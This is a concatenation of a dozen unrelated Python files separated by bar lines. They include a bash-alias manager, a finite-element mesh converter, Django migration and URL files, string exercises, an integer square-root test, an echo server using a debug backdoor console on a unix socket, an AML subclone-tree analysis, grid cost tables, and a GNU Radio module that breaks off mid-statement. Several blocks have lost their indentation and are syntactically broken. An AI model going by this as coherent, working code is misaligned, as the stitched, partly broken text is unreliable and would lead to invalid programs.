    def _clean_script_dir(self):
        """Archive scripts that are no longer referenced by any alias."""
        scripts_in_dir = self._get_current_scripts_in_script_dir()
        scripts_in_alias_file = \
            self._get_current_scripts_in_alias_definition_file()
        for s in scripts_in_dir:
            if s not in scripts_in_alias_file:
                # actually just renames it
                self.remove_file(s)
    def _write_alias_definitions(self, alias_definitions):
        """Rewrite the alias file from *alias_definitions*, keeping a .bak.

        Shared helper extracted from _remove_alias_definition and
        _append_bash_alias_file, which previously duplicated this logic.
        """
        f = tempfile.NamedTemporaryFile(mode='w+t', delete=False)
        new_file = f.name
        for line in alias_definitions:
            if not line == "":
                f.write(line+"\n")
        f.close()
        shutil.move(
            self.alias_definition_file,
            self.alias_definition_file+".bak"
        )
        shutil.move(new_file, self.alias_definition_file)
    def _remove_alias_definition(self, alias):
        """Delete an alias definition from .bash_aliases"""
        remove_alias = self._format_alias_definition(alias)
        alias_definitions = self._get_current_alias_definitions_from_file()
        alias_definitions.remove(remove_alias)
        self._write_alias_definitions(alias_definitions)
        self._clean_script_dir()
    def _append_bash_alias_file(self, new_alias):
        """Append an alias definition to .bash_aliases (kept sorted)."""
        new_alias_definition = self._format_alias_definition(new_alias)
        alias_definitions = self._get_current_alias_definitions_from_file()
        if new_alias_definition not in alias_definitions:
            alias_definitions.append(new_alias_definition)
        alias_definitions.sort()
        self._write_alias_definitions(alias_definitions)
    def _is_alias_in_script_dir(self, alias) -> bool:
        """True if a script named ``<alias>.sh`` exists in the script dir."""
        return os.path.isfile(self.join_script_dir(alias+".sh"))
    def _is_alias_in_alias_definition_file(self, alias) -> bool:
        """True if *alias* is defined in the alias definition file."""
        current_aliases = self._get_current_aliases_in_alias_definition_file()
        return alias in current_aliases
    def add_alias(self, alias):
        """Create a new alias .sh file in the script_dir and add it to
        .bash_aliases file
        Returns:
            True
        """
        if self._is_alias_in_script_dir(alias):
            print("ERROR: alias already exists with that name")
            return True
        else:
            self._append_bash_alias_file(alias)
            new_filename = self.join_script_dir(alias+".sh")
            create_bash_script(new_filename)
            print("SUCCESS: added new alias file to script dir")
            return True
    def remove_alias(self, alias):
        """Remove an existing alias definition and its script file
        Returns:
            True
        """
        db = self._get_db()
        old_alias_file = db.get(alias)
        if old_alias_file is not None:
            self._remove_alias_definition(alias)
            print("SUCCESS: removed old alias from .bash_aliases")
        else:
            print("ERROR: alias does not exist with that name")
        return True
    def help_alias(self, alias):
        """Show the help str from an alias definition
        Returns:
            True
        """
        # only show help if the alias does exist
        db = self._get_db()
        if db.get(alias) is None:
            print("ERROR: alias key {} not in db".format(alias))
        else:
            try:
                script = read_file(db.get(alias))
                print(script)
            # Bug fix: was a bare `except:` which also swallowed
            # KeyboardInterrupt/SystemExit.
            except Exception:
                print("ERROR: reading filename {}".format(db.get(alias)))
        return True
    def find_alias(self, tag) -> dict:
        """Find aliases whose name contains *tag*.
        Returns:
            dict: {alias: script_path} for every match.
        """
        db = self._get_db()
        return {alias: db[alias] for alias in db if tag in alias}
    def edit_alias(self, alias):
        """Edit an alias's script in nano (via a temp copy)
        Returns:
            True
        """
        if not self._is_alias_in_script_dir(alias):
            print("ERROR: alias script does not exist with that name")
            return True
        # only edit if the alias does exist
        db = self._get_db()
        if db.get(alias) is None:
            print("ERROR: alias key {} not in db".format(alias))
        else:
            try:
                filename = self.join_script_dir(alias+".sh")
                script = read_file(filename)
                f = tempfile.NamedTemporaryFile(mode='w+t', delete=False)
                n = f.name
                f.write(script)
                f.close()
                subprocess.call(['nano', n])
                shutil.move(f.name, filename)
                os.chmod(filename, 0o755)
            # Bug fix: was a bare `except:` which also swallowed
            # KeyboardInterrupt/SystemExit.
            except Exception:
                print("ERROR: writing filename {}".format(alias+".sh"))
        return True
    def rename_alias(self, old_name, new_name):
        """Rename an alias by adding the new one, copying the script,
        then removing the old one.
        Returns:
            True
        """
        if self._is_alias_in_script_dir(new_name):
            print("ERROR: alias already exists with that name in script dir")
            return True
        if not self._is_alias_in_script_dir(old_name):
            print("ERROR: alias does not exist with that name in script dir")
            return True
        if not self._is_alias_in_alias_definition_file(old_name):
            print("ERROR: alias does not exist with that name in alias file")
            return True
        self.add_alias(new_name)
        shutil.copy(
            self.join_script_dir(old_name+".sh"),
            self.join_script_dir(new_name+".sh")
        )
        self.remove_alias(old_name)
        return True
    def test_aliash_tool(self):
        """Smoke-test hook.
        Returns:
            True
        """
        return True
|
#
# Copyright (c) 2018 TECHNICAL UNIVERSITY OF MUNICH, DEPARTMENT OF MECHANICAL ENGINEERING, CHAIR OF APPLIED MECHANICS,
# BOLTZMANNSTRASSE 15, 85748 GARCHING/MUNICH, GERMANY, RIXEN@TUM.DE.
#
# Distributed under 3-Clause BSD license. See LICENSE file for more information.
#
"""
AMfe mesh converter for I/O module.
"""
import numpy as np
import pandas as pd
from amfe.io.mesh.base import MeshConverter
from amfe.io.mesh.constants import VOLUME_ELEMENTS_2D, VOLUME_ELEMENTS_3D, BOUNDARY_ELEMENTS_2D, BOUNDARY_ELEMENTS_3D
from amfe.mesh import Mesh
# Public API of this module.
__all__ = [
    'AmfeMeshConverter'
]
class AmfeMeshConverter(MeshConverter):
    """
    Converter for AMfe meshes.
    Examples
    --------
    Convert GiD json file to AMfe mesh:
    >>> from amfe.io.mesh.reader import GidJsonMeshReader
    >>> from amfe.io.mesh.writer import AmfeMeshConverter
    >>> filename = '/path/to/your/file.json'
    >>> converter = AmfeMeshConverter()
    >>> reader = GidJsonMeshReader(filename)
    >>> reader.parse(converter)
    >>> converter.return_mesh()
    """
    def __init__(self, verbose=False):
        super().__init__()
        self._verbose = verbose
        self._mesh = Mesh()
        self._dimension = None
        self._no_of_nodes = None
        self._no_of_elements = None
        # Node buffer: one row per node, columns [external id, x, y, z].
        self._nodes = np.empty((0, 4), dtype=float)
        self._currentnodeid = 0
        self._groups = dict()
        self._tags = dict()
        # df information
        self._el_df_indices = list()
        self._el_df_eleshapes = list()
        self._el_df_connectivity = list()
        self._el_df_is_boundary = list()
        return
    def build_no_of_nodes(self, no):
        # This function is only used for preallocation
        # It is not necessary to call, but useful if information about no_of_nodes exists
        self._no_of_nodes = no
        if self._nodes.shape[0] == 0:
            self._nodes = np.zeros((no, 4), dtype=float)
        return
    def build_no_of_elements(self, no):
        # This function is not used
        # If someone wants to improve performance he/she can add preallocation functionality for elements
        self._no_of_elements = no
        # preallocation...
        return
    def build_mesh_dimension(self, dim):
        """Set the spatial dimension (2 or 3) of the mesh."""
        self._dimension = dim
        return
    def build_node(self, idx, x, y, z):
        """Store one node with external id *idx* and coordinates (x, y, z)."""
        # amfeid is the row-index in nodes array
        amfeid = self._currentnodeid
        # Check if preallocation has been done so far
        if self._no_of_nodes is not None:
            # write node in preallocated array
            self._nodes[amfeid, :] = [idx, x, y, z]
        else:
            # append node if array is not preallocated with full node dimension
            self._nodes = np.append(self._nodes, np.array([idx, x, y, z], dtype=float, ndmin=2), axis=0)
        self._currentnodeid += 1
        return
    def build_element(self, idx, etype, nodes):
        """Record one element's id, shape name, and node connectivity."""
        # update df information
        self._el_df_connectivity.append(np.array(nodes, dtype=int))
        self._el_df_indices.append(idx)
        self._el_df_eleshapes.append(etype)
        return
    def build_group(self, name, nodeids=None, elementids=None):
        """Register a named group of node ids and/or element ids."""
        # append group information
        group = {name: {'nodes': nodeids, 'elements': elementids}}
        self._groups.update(group)
        return
    def build_tag(self, tag_dict):
        """Merge *tag_dict* into the collected tag information."""
        # append tag information
        self._tags.update(tag_dict)
        return None
    def return_mesh(self):
        """Assemble and return the Mesh built from all collected data."""
        # Check dimension of model
        if self._dimension is None:
            if not VOLUME_ELEMENTS_3D.intersection(set(self._el_df_eleshapes)):
                # No 3D element in eleshapes, thus:
                self._dimension = 2
            else:
                self._dimension = 3
        # If dimension = 2 cut the z coordinate
        x = self._nodes[:, 1]
        y = self._nodes[:, 2]
        if self._dimension == 2:
            self._mesh.nodes_df = pd.DataFrame({'x': x, 'y': y}, index=np.array(self._nodes[:, 0], dtype=int))
        else:
            z = self._nodes[:, 3]
            self._mesh.nodes_df = pd.DataFrame({'x': x, 'y': y, 'z': z}, index=np.array(self._nodes[:, 0], dtype=int))
        # divide in boundary and volume elements
        if self._dimension == 3:
            volume_element_set = VOLUME_ELEMENTS_3D
            boundary_element_set = BOUNDARY_ELEMENTS_3D
        elif self._dimension == 2:
            volume_element_set = VOLUME_ELEMENTS_2D
            boundary_element_set = BOUNDARY_ELEMENTS_2D
        else:
            raise ValueError('Dimension must be 2 or 3')
        # write properties
        self._mesh.dimension = self._dimension
        # Flag every element whose shape belongs to the boundary set.
        self._el_df_is_boundary = len(self._el_df_connectivity)*[False]
        for index, shape in enumerate(self._el_df_eleshapes):
            if shape in boundary_element_set:
                self._el_df_is_boundary[index] = True
        data = {'shape': self._el_df_eleshapes,
                'is_boundary': self._el_df_is_boundary,
                'connectivity': self._el_df_connectivity}
        self._mesh.el_df = pd.DataFrame(data, index=self._el_df_indices)
        self._mesh.groups = self._groups
        for tag_name, tag_dict in self._tags.items():
            self._mesh.insert_tag(tag_name, tag_dict)
        return self._mesh
|
from django.db import models, migrations
class Migration(migrations.Migration):
    """Add per-page template-override and controller-path fields to Page."""
    dependencies = [
        ('content', '0010_sitesettings_google_analytics_token'),
    ]
    operations = [
        migrations.AddField(
            model_name='page',
            name='override_page_template',
            # Finnish help text: pages are rendered with this template, which
            # must exist in the source tree.
            field=models.CharField(default='', help_text='Sivut n\xe4ytet\xe4\xe4n k\xe4ytt\xe4en t\xe4t\xe4 sivupohjaa. T\xe4m\xe4nnimisen sivupohjan tulee l\xf6yty\xe4 l\xe4hdekoodista.', max_length=127, verbose_name='Sivupohja', blank=True),
        ),
        migrations.AddField(
            model_name='page',
            name='page_controller_code',
            # Finnish help text: path to a function run on every page load
            # that can add variables to the template namespace.
            field=models.CharField(default='', help_text='Polku funktioon, joka suoritetaan joka sivulatauksella ja joka voi m\xe4\xe4ritell\xe4 lis\xe4\xe4 muuttujia sivupohjan nimiavaruuteen.', max_length=255, verbose_name='Sivukontrolleri', blank=True),
        ),
    ]
|
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Additional basic string exercises
# D. verbing
# Given a string, if its length is at least 3,
# add 'ing' to its end.
# Unless it already ends in 'ing', in which case
# add 'ly' instead.
# If the string length is less than 3, leave it unchanged.
# Return the resulting string.
def verbing(s):
    """Append 'ing' (or 'ly' if it already ends in 'ing'); strings shorter
    than 3 characters are returned unchanged."""
    if len(s) < 3:
        return s
    ending = 'ly' if s.endswith('ing') else 'ing'
    return s + ending
# E. not_bad
# Given a string, find the first appearance of the
# substring 'not' and 'bad'. If the 'bad' follows
# the 'not', replace the whole 'not'...'bad' substring
# with 'good'.
# Return the resulting string.
# So 'This dinner is not that bad!' yields:
# This dinner is good!
def not_bad(s):
    """Replace the span from the first 'not' through the first 'bad' with
    'good', when 'bad' follows 'not'; otherwise return s unchanged."""
    not_pos = s.find('not')
    bad_pos = s.find('bad')
    if not_pos == -1 or bad_pos == -1 or not_pos > bad_pos:
        return s
    # Skip the three characters of 'bad' itself.
    return s[:not_pos] + 'good' + s[bad_pos + 3:]
# F. front_back
# Consider dividing a string into two halves.
# If the length is even, the front and back halves are the same length.
# If the length is odd, we'll say that the extra char goes in the front half.
# e.g. 'abcde', the front half is 'abc', the back half 'de'.
# Given 2 strings, a and b, return a string of the form
# a-front + b-front + a-back + b-back
def front_back(a, b):
    """Return a-front + b-front + a-back + b-back.

    Each string is split into halves; when the length is odd the extra
    character goes into the front half.
    """
    # Integer ceiling division replaces the fragile round(len/2 + .1)
    # trick, and the leftover debug print of the inputs is removed.
    a_split = (len(a) + 1) // 2
    b_split = (len(b) + 1) // 2
    return a[:a_split] + b[:b_split] + a[a_split:] + b[b_split:]
# Simple provided test() function used in main() to print
# what each function returns vs. what it's supposed to return.
def test(got, expected):
if got == expected:
prefix = ' OK '
else:
prefix = ' X '
print(prefix + ' got: ' + got + ' expected: ' + expected)
# main() calls the above functions with interesting inputs,
# using the above test() to check if the result is correct or not.
def main():
    """Exercise verbing/not_bad/front_back against known expected outputs."""
    print('verbing')
    test(verbing('hail'), 'hailing')
    test(verbing('swiming'), 'swimingly')
    test(verbing('do'), 'do')
    print()
    print('not_bad')
    test(not_bad('This movie is not so bad'), 'This movie is good')
    test(not_bad('This dinner is not that bad!'), 'This dinner is good!')
    test(not_bad('This tea is not hot'), 'This tea is not hot')
    test(not_bad("It's bad yet not"), "It's bad yet not")
    print()
    print('front_back')
    test(front_back('abcd', 'xy'), 'abxcdy')
    test(front_back('abcde', 'xyz'), 'abcxydez')
    test(front_back('Kitten', 'Donut'), 'KitDontenut')
# Runs unconditionally on import; an `if __name__ == '__main__':` guard
# would be the conventional form.
main()
|
from .loss import *
from .misc import *
from .transform import OutputTransform
|
# Random tests
import math
if 1:
def isqrt(x):
op = x
res = 0
one = 1 << 30
while one > op:
one >>= 2
while one != 0:
if op >= res + one:
op -= res + one
res += one << 1
res >>= 1
one >>= 2
return res
def isqrt64(x):
op = x
res = 0
one = 1 << 62
while one > op:
one >>= 2
while one != 0:
if op >= res + one:
op -= res + one
res += one << 1
res >>= 1
one >>= 2
return res
    # Spot-check isqrt64 against math.sqrt on evenly spaced 64-bit samples.
    # NOTE(review): int(math.sqrt(x)) loses precision for large x, so any
    # mismatches printed here may be float error rather than isqrt64 bugs.
    for x in range(0, 2 ** 64, 2 ** 48):
        i = isqrt64(x)
        s = int(math.sqrt(x))
        if i != s:
            print(x, i, s)
    print("finish")
|
from django.conf.urls import patterns, url
from portfolio.views import (ArtifactDetail, ArtifactList, ProjectDetail,
ProjectList, CategoryDetail, CategoryList)
# Category -> project -> artifact URL hierarchy for the portfolio app.
# NOTE(review): django.conf.urls.patterns() was removed in Django 1.10; this
# URLconf targets an older Django release -- confirm before upgrading.
urlpatterns = patterns(
    '',
    url(r'^(?P<category_slug>[-\w]+)/projects/(?P<project_slug>[-\w]+)/pages/'
        '(?P<artifact_slug>[-\w]+)/$', ArtifactDetail.as_view(),
        name='artifact_detail'),
    url(r'^(?P<category_slug>[-\w]+)/projects/(?P<project_slug>[-\w]+)/'
        'pages/$', ArtifactList.as_view(), name='artifact_list'),
    url(r'^(?P<category_slug>[-\w]+)/projects/(?P<project_slug>[-\w]+)/$',
        ProjectDetail.as_view(), name='project_detail'),
    url(r'^(?P<category_slug>[-\w]+)/projects/$', ProjectList.as_view(),
        name='project_list'),
    url(r'^(?P<category_slug>[-\w]+)/$', CategoryDetail.as_view(),
        name='category_detail'),
    url(r'^$', CategoryList.as_view(),
        name='category_list'),
)
|
from setuptools import setup
# Use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
    long_description = f.read()
# Package metadata for the single-module `thesmuggler` distribution.
setup(
    name='thesmuggler',
    version='1.0.1',
    py_modules=['thesmuggler'],
    description='Sidestep import and load Python files as relative paths',
    long_description=long_description,
    keywords='import modules packages files',
    license='MIT',
    author='Faraz Yashar',
    author_email='faraz.yashar@gmail.com',
    url='https://github.com/fny/thesmuggler',
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Intended Audience :: Developers',
        'Topic :: Software Development',
        'Topic :: Utilities',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3'
    ]
)
|
# -*- Mode: Python -*-
import coro
import coro.backdoor
import sys
import curses
import pyximport
# Enable on-the-fly compilation of .pyx modules on import.
pyximport.install()
# Local cython checkout providing the `newterm` extension below.
sys.path.append ('/Users/rushing/src/cython')
import newterm
def session(conn, addr):
    """Echo every block received on *conn* back to the peer until EOF."""
    while True:
        chunk = conn.recv(1000)
        if not chunk:
            break
        conn.send(chunk)
def serve (port=9000):
    """Accept TCP connections forever, spawning one echo session per client."""
    s = coro.tcp_sock()
    s.bind (('', port))
    s.listen (50)
    while 1:
        conn, addr = s.accept()
        # One coroutine per client connection.
        coro.spawn (session, conn, addr)
if __name__ == '__main__':
    # Backdoor shell on a unix socket for live inspection, plus the echo server.
    coro.spawn (coro.backdoor.serve, unix_path='/tmp/xx.bd')
    coro.spawn (serve)
    coro.event_loop()
|
import numpy as np
import pandas as pd
from tqdm import tqdm
import networkx as nx
import matplotlib.pyplot as plt
# Input: space-separated table of subclone mutation presence per AML case.
in_path = "AMLsubclones_trees.txt"
df = pd.read_csv(in_path,sep=" ")
debug_processing = 0
print_trees = 0
print(df)
# Gene columns start at index 3; the leading columns are assumed to be
# case metadata (e.g. "case", "freq") -- TODO confirm against the file.
genes = df.columns.values[3:]
cases = df["case"].unique()
# Pseudo-gene used as the root of every inferred tree.
germline_gene = "germ"
print(genes)
print(genes.shape)
print(cases)
print(cases.shape)
def print_tree(tree):
    """Draw *tree* with matplotlib (blocks until the window is closed)."""
    nx.draw(tree,with_labels=True)
    plt.draw()
    plt.show()
# Statistics accumulated across all cases by the main loop below.
max_depth = 0
max_numedges = 0
numedgesdist = dict()
def compute_tree(case_df):
    """Infer a subclone tree for one case from gene occurrence patterns.

    Builds a directed tree rooted at the germline pseudo-gene: genes with
    identical occurrence columns are merged into a single node, and each
    node's parent is chosen as the smallest strict superset pattern. Also
    records, for every gene pair, a labeled relation: "-?-" identical,
    "->-" subset, "-/-" incomparable.

    NOTE: mutates *case_df* in place (drops/renames merged gene columns).

    Returns:
        (networkx.DiGraph, list): the tree and the labeled pair list.
    """
    global print_trees,max_numedges
    debug_tree = 0
    if debug_tree == 1:
        print(case_df)
    G = nx.DiGraph()
    cols_ = case_df.columns
    cols_ = set(cols_)
    genes_set = set(genes)
    # Only genes actually present as columns of this case's frame.
    genes_case = genes_set.intersection(cols_)
    #set_germ = set()
    #set_germ.add(germline_gene)
    G.add_node(germline_gene)
    #print_tree(G)
    #print(case_df)
    # compute set of all edges
    edges_list = list()
    num_genes = len(genes_case)
    genes_list = list(genes_case)
    i=0
    j=0
    #print(genes_list)
    # Pairwise comparison of occurrence vectors to classify each relation.
    for i in range(num_genes):
        gene_1 = genes_list[i]
        #print("first gene",gene_1)
        occurence_gene_1 = case_df[gene_1].values
        #for gene_2 in genes_list:
        #print([k for k in range(i+1,num_genes)])
        for j in range(i+1,num_genes):
            gene_2 = genes_list[j]
            #print(" second gene",gene_2)
            if gene_1 != gene_2:
                occurence_gene_2 = case_df[gene_2].values
                if (occurence_gene_2 == occurence_gene_1).all():
                    sorted_pair = [gene_1,gene_2]
                    sorted_pair.sort()
                    edges_list.append((sorted_pair[0],sorted_pair[1],"-?-"))
                    continue
                # if occurences of gene 1 is a subset of gene 2
                if (np.logical_or(occurence_gene_1 , occurence_gene_2) == occurence_gene_2).all():
                    edges_list.append((gene_2,gene_1,"->-"))
                    continue
                # if occurences of gene 1 is a subset of gene 1
                if (np.logical_or(occurence_gene_1 , occurence_gene_2) == occurence_gene_1).all():
                    edges_list.append((gene_1,gene_2,"->-"))
                    continue
                sorted_pair = [gene_1,gene_2]
                sorted_pair.sort()
                edges_list.append((sorted_pair[0],sorted_pair[1],"-/-"))
    #print("number of edges for case",len(edges_list))
    # Update the global edge-count histogram and maximum.
    edges_len = len(edges_list)
    if edges_len in numedgesdist:
        numedgesdist[edges_len] = numedgesdist[edges_len]+1
    else:
        numedgesdist[edges_len] = 1
    max_numedges = max(max_numedges , edges_len)
    #print("edges_list",edges_list)
    # first check if there is another with the same occurences of gene_1
    genes_to_check = set(genes_case)
    new_genes = list()
    merged_nodes = False
    # Merge genes with identical occurrence vectors into one "g1-g2" node.
    while len(genes_to_check) > 0:
        gene_1 = genes_to_check.pop()
        if debug_tree == 1:
            print("checking for duplicates",gene_1)
        occurence_gene_1 = case_df[gene_1].values
        if debug_tree == 1:
            print("occurence_gene_1",occurence_gene_1)
        insert_in_node = False
        to_merge = list()
        for gene_2 in genes_to_check:
            if gene_2 != germline_gene and gene_1 != gene_2:
                if debug_tree == 1:
                    print(" check gene_2",gene_2)
                occurence_gene_2 = case_df[gene_2].values
                if debug_tree == 1:
                    print("occurence_gene_2",occurence_gene_2)
                if (occurence_gene_2 == occurence_gene_1).all():
                    # merge gene_1 and gene_2
                    to_merge.append(gene_2)
                    if debug_tree == 1:
                        print("found node with same occurences!",gene_1,gene_2)
                    #debug_tree = 1
                    merged_nodes = True
        gene_1_old = gene_1
        for gene_2 in to_merge:
            gene_1 = gene_1+"-"+gene_2
            genes_to_check.remove(gene_2)
            case_df.drop(columns=gene_2,inplace=True)
        new_genes.append(gene_1)
        case_df.rename(columns={gene_1_old : gene_1},inplace=True)
        if len(to_merge) > 0 and debug_tree == 1:
            print("merged",gene_1)
            print(case_df)
    genes_case = set(new_genes)
    # Attach every merged node to the smallest superset parent (or germline).
    for gene_1 in genes_case:
        if debug_tree == 1:
            print("Finding the parent of ",gene_1)
        occurence_gene_1 = case_df[gene_1].values
        parent_gene = ""
        parent_gene_count = occurence_gene_1.shape[0]+1
        for gene_2 in genes_case:
            if gene_1 != gene_2:
                occurence_gene_2 = case_df[gene_2].values
                ok_pattern = True
                for idx , occ1 in enumerate(occurence_gene_1):
                    if occ1 > occurence_gene_2[idx]:
                        ok_pattern = False
                        break
                if ok_pattern == True:
                    if debug_tree == 1:
                        print(" ",gene_2,"may be parent")
                    if occurence_gene_2.sum() < parent_gene_count:
                        parent_gene_count = occurence_gene_2.sum()
                        parent_gene = gene_2
                        if debug_tree == 1:
                            print(" ",gene_2,"is current candidate parent",parent_gene_count)
        if len(parent_gene) > 0:
            G.add_edge(parent_gene , gene_1)
            if debug_tree == 1:
                print(" parent found!",parent_gene)
        else:
            G.add_edge(germline_gene , gene_1)
            if debug_tree == 1:
                print(" germline is parent!")
        if debug_tree == 1:
            print(gene_1,nx.descendants(G,gene_1))
    #print(len(G.nodes))
    if merged_nodes == True and debug_tree == 1:
        debug_tree = 0
        print_tree(G)
    return G , edges_list
def get_filtered_data_case(data , case_id):
    """Select one case's rows and occurring genes, then build its tree.

    Returns:
        (DataFrame, networkx.DiGraph, list): the filtered frame (sorted by
        descending freq), the inferred tree, and the labeled edge list.
    """
    data_case = data.loc[ data["case"]==case_id ]
    filtered_cols = ["case", "freq"]
    for gene in genes:
        #print(gene)
        #print(data_case[gene])
        #print(data_case[gene].sum())
        #print("")
        # Keep only genes that actually occur in this case.
        if data_case[gene].sum() > 0:
            filtered_cols.append(gene)
    filtered_data_case = data_case[filtered_cols].sort_values("freq",ascending=False)
    case_tree , edge_list = compute_tree(filtered_data_case)
    if print_trees == 1:
        print_tree(case_tree)
    return filtered_data_case , case_tree , edge_list
# Map each gene name to a stable integer id (currently unused downstream).
n_genes = genes.shape[0]
genes_dict = dict()
i = 0
for gene in genes:
    genes_dict[gene] = i
    i = i + 1
# Output: one line of labeled gene-pair relations per case.
edges_path = "trees-aml.txt"
fout_edges = open(edges_path,"w")
edge_ids = dict()
edge_id_to_assign = 1
num_nodes = dict()
# Build the tree for every case, writing edges and gathering statistics.
for case_id in tqdm(cases):
    #case_id = cases[i]
    filtered_data_case , case_tree , edge_list = get_filtered_data_case(df, case_id)
    tree_depths = nx.shortest_path_length(case_tree, source=germline_gene)
    num_nodes_tree = len(list(case_tree.nodes))
    #print("num_nodes_tree",num_nodes_tree)
    if num_nodes_tree in num_nodes:
        num_nodes[num_nodes_tree] = num_nodes[num_nodes_tree] + 1
    else:
        num_nodes[num_nodes_tree] = 1
    #print this edge list
    #print(edge_list)
    if len(edge_list) < 1:
        pass
        #print_tree(case_tree)
    else:
        edge_ids_line = list()
        for edge in edge_list:
            # Serialize as "<gene1><label><gene2> " (label is -?-, ->- or -/-).
            fout_edges.write(str(edge[0])+str(edge[2])+str(edge[1])+" ")
            # if edge in edge_ids:
            # edge_id = edge_ids[edge]
            # else:
            # edge_ids[edge] = edge_id_to_assign
            # edge_id = edge_id_to_assign
            # edge_id_to_assign += 1
            # edge_ids_line.append(edge_id)
        #edge_ids_line.sort()
        #for edge_id in edge_ids_line:
        #fout_edges.write(str(edge_id)+" ")
        fout_edges.write("\n")
    #print("tree_depths",tree_depths)
    #print_tree(case_tree)
    max_depth = max(max_depth , max(tree_depths.values()))
print("max_depth",max_depth)
print("max_numedges",max_numedges)
print("numedgesdist",numedgesdist)
print("num_nodes",num_nodes)
# Average node count excluding the germline root (hence numnode_ - 1).
avg_numnodes = 0.
tot_graphs = sum(list(num_nodes.values()))
for numnode_ in num_nodes:
    avg_numnodes += (numnode_-1)*num_nodes[numnode_]/tot_graphs
print("average num_nodes",avg_numnodes)
fout_edges.close()
# plot histogram of number of nodes
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import colors
fig, axs = plt.subplots(1, 1, sharey=True, tight_layout=True,figsize=(5,4))
width = 0.5
plt.bar(np.array(list(num_nodes.keys())), num_nodes.values(), width)#, color='blue')
plt.title("Distribution of number of nodes (avg="+str(avg_numnodes)[0:4]+")")
plt.xlabel("Number of nodes")
plt.ylabel("Number of trees")
plt.savefig("aml_statistics.pdf",dpi=300)
#plt.show()
|
import os
# Annual US inflation rate, in percent, keyed by year.
inflation_rate_pct = {
    2010: 1.5,
    2011: 3.0,
    2012: 1.7,
    2013: 1.5,
    2014: 0.8,
    2015: 0.7,
    2016: 2.1,
    2017: 2.1,
    2018: 1.9,
    2019: 2.3,
    2020: 1.4,
}
# Representative HVDC line: rating and cost per MW-mile.
hvdc_line_cost = {
    "kV": 500,
    "MW": 3500,
    "costMWmi": (3200 / 7),
}
# 2020 USD, from MISO cost estimations
hvdc_terminal_cost_per_MW = 135e3  # noqa: N816
# AC line cost table: parallel lists indexed by line configuration.
ac_line_cost = {
    "kV": [229, 230, 230, 230, 345, 345, 345, 345, 500, 765],
    "MW": [300, 600, 900, 1200, 500, 900, 1800, 3600, 2600, 4000],
    "costMWmi": [
        3666.67,
        2000,
        1777.78,
        1500,
        39600,  # NOTE(review): an order of magnitude above its neighbors -- possible typo (3960?); confirm against the source data
        2333.33,
        1388.89,
        777.78,
        1346.15,
        1400,
    ],
}
# Transformer cost by voltage class (USD).
transformer_cost = {
    "kV": [230, 345, 500, 765],
    "Cost": [5.5e6, 8.5e6, 22.75e6, 42.5e6],
}
# Paths to bundled data files used by the cost calculations.
data_dir = os.path.join(os.path.dirname(__file__), "data")
ac_reg_mult_path = os.path.join(data_dir, "LineRegMult.csv")
bus_neem_regions_path = os.path.join(data_dir, "buses_NEEMregion.csv")
bus_reeds_regions_path = os.path.join(data_dir, "buses_ReEDS_region.csv")
gen_inv_cost_path = os.path.join(data_dir, "2020-ATB-Summary_CAPEX.csv")
neem_shapefile_path = os.path.join(data_dir, "NEEM", "NEEMregions.shp")
reeds_mapping_hierarchy_path = os.path.join(data_dir, "mapping", "hierarchy.csv")
reeds_wind_csv_path = os.path.join(data_dir, "mapping", "gis_rs.csv")
reeds_wind_shapefile_path = os.path.join(data_dir, "rs", "rs.shp")
reeds_wind_to_ba_path = os.path.join(data_dir, "mapping", "region_map.csv")
regional_multiplier_path = os.path.join(data_dir, "reg_cap_cost_mult_default.csv")
transformer_cost_path = os.path.join(data_dir, "transformer_cost.csv")
# Maps ATB technology names to this package's generator type names.
gen_inv_cost_translation = {
    "OffShoreWind": "wind_offshore",
    "LandbasedWind": "wind",
    "UtilityPV": "solar",
    "Battery": "storage",
    "NaturalGas": "ng",
    "Hydropower": "hydro",
    "Nuclear": "nuclear",
    "Geothermal": "geothermal",
    "Coal": "coal",
}
# One representative ATB tech detail is kept per generator type.
gen_inv_cost_techdetails_to_keep = {
    "HydroFlash",  # Single tech for geothermal
    "NPD1",  # Single tech for hydro
    "newAvgCF",  # Single tech for coal
    "CCAvgCF",  # Single tech for ng
    "OTRG1",  # Single tech for wind_offshore
    "LTRG1",  # Single tech for wind
    "4Hr Battery Storage",  # Single tech for storage
    "Seattle",  # Single tech for solar
    "*",  # Single tech for nuclear
}
# Maps regional-multiplier table technology names to generator type names.
regional_multiplier_gen_translation = {
    "wind-ofs_1": "wind_offshore",
    "wind-ons_1": "wind",
    "upv_1": "solar",
    "battery": "storage",
    "Gas-CC": "ng",
    "Nuclear": "nuclear",
    "Hydro": "hydro",
    "coal-new": "coal",
}
# Which region granularity applies to each generator type's multiplier.
regional_multiplier_wind_region_types = {"wind", "wind_offshore", "csp"}
regional_multiplier_ba_region_types = {
    "solar",
    "storage",
    "nuclear",
    "coal",
    "ng",
    "hydro",
    "geothermal",
}
|
# Copyright 2007, 2015 Free Software Foundation, Inc.
# This file is part of GNU Radio
#
# GNU Radio Companion is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# GNU Radio Companion is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
import traceback
import sys
import os
# Callbacks that each receive every emitted message string.
MESSENGERS_LIST = []
_indent = ''


def register_messenger(messenger):
    """Add *messenger* (a callable taking one string) to the broadcast list."""
    MESSENGERS_LIST.append(messenger)


def set_indent(level=0):
    """Set the indentation prefix to *level* spaces for subsequent messages."""
    global _indent
    _indent = ' ' * level


def send(message):
    """Broadcast *message*, prefixed with the current indent, to all messengers."""
    for receiver in MESSENGERS_LIST:
        receiver(_indent + message)


# stdout receives all messages by default
register_messenger(sys.stdout.write)
###########################################################################
# Special functions for specific program functionalities
###########################################################################
def send_init(platform):
    """Print the welcome banner with app name/version and configured block paths."""
    msg = "<<< Welcome to {config.name} {config.version} >>>\n\n" \
